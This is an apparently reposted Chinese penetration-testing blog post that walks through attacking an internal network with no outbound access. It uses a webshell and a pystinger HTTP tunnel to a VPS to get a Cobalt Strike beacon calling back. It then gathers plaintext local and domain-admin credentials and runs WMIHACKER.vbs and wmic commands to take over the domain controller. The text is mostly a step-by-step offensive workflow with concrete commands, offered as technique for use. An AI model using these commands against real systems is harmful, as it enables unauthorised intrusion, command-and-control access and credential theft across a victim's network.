[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线...

Delina

原文链接：[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike？
​
当跳板机器出网的情况下，我们可以随意内网渗透，只需注意免杀问题，那如何拿到一个 Webshell 不出网的情况下，如何进目标内网？如何上线到 C2？
不出网的内网域渗透
前言
首先是拿到了一个 Webshell：

​

通过初步判断当前机器 icmp 不出网：

​

那怎么办呢？我们可以基于 HTTP 隧道打！
基于 HTTP 隧道上线到 CobaltStrike
项目地址：https://github.com/FunnyWolf/pystinger
这个东东可以让 Webshell 实现内网 Socks4 代理，让不出网机器上线到 MSF/CS，使用 python 写的一款工具，支持目标站点 php、jsp（x）、aspx 三种脚本语言！
先上传对应的 Pystinger webshell 文件并成功访问：

​

然后我们还需要将 stinger_server.exe 上传到目标服务器 ，执行如下命令：
start c:\Windows\temp\cookie\stinger_server.exe 0.0.0.0

​

然后将 stinger_client 上传到 vps ，执行如下命令
./stinger_client -w http://saulgoodman.cn:9009//wls-wsat/proxy.jsp -l 0.0.0.0 -p 60000

​

此时已将目标服务器的 60020 端口映射到 VPS 的 60020 端口了！
这个时候我们 CobaltStrike 设置监听，http host 填写目标内网的  IP 地址：192.168.0.9，端口填写 60020:

​

​

然后我们生成一个 exe，监听器就是刚刚设置的那个：

​

然后目标运行 exe 马，直接上线到 CobaltStrike：

​

内网信息搜集
通过 nbtscan 对当前内网进行信息搜集发现当前内网是存在域环境的：

​

由于当前已经是 administrator 了，且是 Windows 2008 的机器，可以直接抓明文：

​

抓到了本地管理员和域管明文还有一些域用户的明文！既然域控是 192.168.0.2 这台，那么直接 WMI 横向把：
shell cscript  c:\windows\temp\WMIHACKER.vbs /cmd 192.168.0.2 BExxxx\administrator vmxxxxx whoami 1

​

直接拿到域控 system 权限！我们还可以用系统自带的 WMI 来执行命令，只不过命令不回显：

1. wmic /node:192.168.0.2 /user:BEHxxxx\administrator /password:vm$xxxx process call create "cmd.exe /c ipconfig > c:\result.txt"
   
2.             
   
3. type \\192.168.0.2\c$\result.txt

复制代码

​

这篇文章主要就是想表达不出网也是可以对它进行内网渗透的，并不是遇到不出网环境就不能打内网，方法很多，知识面还是会决定你的杀伤链！
​